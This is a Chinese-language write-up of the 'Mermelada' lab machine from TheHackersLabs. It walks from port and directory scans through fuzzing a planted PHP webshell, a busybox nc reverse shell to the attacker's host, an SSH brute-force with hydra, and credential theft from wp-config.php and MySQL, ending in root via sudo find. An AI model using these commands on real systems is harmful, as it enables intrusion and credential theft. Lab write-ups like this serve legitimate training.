Mermelada

image

靶机地址:https://labs.thehackerslabs.com/machine/164

192.168.100.33

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.33                                                       [13:46:36]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.33:22
Open 192.168.100.33:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 13:53 CST
Initiating ARP Ping Scan at 13:53
Scanning 192.168.100.33 [1 port]
Completed ARP Ping Scan at 13:53, 1.44s elapsed (1 total hosts)
Nmap scan report for 192.168.100.33 [host down, received no-response]
Read data files from: /usr/share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.47 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)

80/tcp扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.33/                                              [13:53:29]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.33/__26-01-21_13-53-52.txt

Target: http://192.168.100.33/

[13:53:52] Starting:
[13:53:54] 403 -  279B  - /.ht_wsr.txt
[13:53:54] 403 -  279B  - /.htaccess.bak1
[13:53:54] 403 -  279B  - /.htaccess.orig
[13:53:54] 403 -  279B  - /.htaccess.save
[13:53:54] 403 -  279B  - /.htaccess.sample
[13:53:55] 403 -  279B  - /.htaccess_orig
[13:53:55] 403 -  279B  - /.htaccess_sc
[13:53:55] 403 -  279B  - /.htaccess_extra
[13:53:55] 403 -  279B  - /.htaccessBAK
[13:53:55] 403 -  279B  - /.htaccessOLD2
[13:53:55] 403 -  279B  - /.htaccessOLD
[13:53:55] 403 -  279B  - /.htm
[13:53:55] 403 -  279B  - /.html
[13:53:55] 403 -  279B  - /.htpasswds
[13:53:55] 403 -  279B  - /.htpasswd_test
[13:53:55] 403 -  279B  - /.httr-oauth
[13:53:56] 403 -  279B  - /.php
[13:54:12] 200 -  642B  - /login.php
[13:54:16] 403 -  279B  - /server-status
[13:54:16] 403 -  279B  - /server-status/
[13:54:19] 301 -  318B  - /uploads  ->  http://192.168.100.33/uploads/
[13:54:19] 200 -  457B  - /uploads/
[13:54:28] 200 -   12KB - /wordpress/
[13:54:33] 200 -    3KB - /wordpress/wp-login.php

Task Completed

有一个wp的网站

使用wpscan扫描一下wordpress

image

里面有一个/2026/01/macoduweklgkmvp-1767607866.7342.php显示GIF89a

image

有点像使用图片绕过的webshell

fuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@LAPTOP-O235O5EH [~] ➜  wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -u http://192.168.100.33/wordpress/wp-content/uploads/2026/01/macoduweklgkmvp-1767607866.7342.php\?FUZZ\=id --hc 404,500
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.100.33/wordpress/wp-content/uploads/2026/01/macoduweklgkmvp-1767607866.7342.php?FUZZ=id
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000915:   200        3 L      5 W        68 Ch       "cmd"

Total time: 0
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 0

image

提权

www shell

反弹个shell

1
busybox nc 192.168.100.31 7777 -e /bin/bash

image

www -> debian

1
cat /etc/passwd | grep "home"

image

有两个用户,尝试爆破debian

1
hydra -l debian -P /usr/share/wordlists/rockyou.txt 192.168.100.33 ssh -t 4 -vV

image

debian -> mermeladita

在/opt目录下有提示 .credenciales

image

数据库,那么去查看一下wp的数据库账号和密码

/var/www/html/wordpress/wp-config.php

image

root:12345

登录mysql

1
mysql -uroot -p12345

image

得到第二个用户的凭证

mermeladita:pepitU

mermeladita -> root

1
su mermeladita

sudo提权

1
2
3
4
5
6
mermeladita@debian:/var/www/html/wordpress$ sudo -l
Matching Defaults entries for mermeladita on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User mermeladita may run the following commands on debian:
    (ALL : ALL) NOPASSWD: /usr/bin/find

以以root身份无密码执行 /usr/bin/find

gtfobins有现成方案。直接使用就好了

https://gtfobins.org/gtfobins/find/

1
2
3
4
mermeladita@debian:/var/www/html/wordpress$ sudo /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
root
#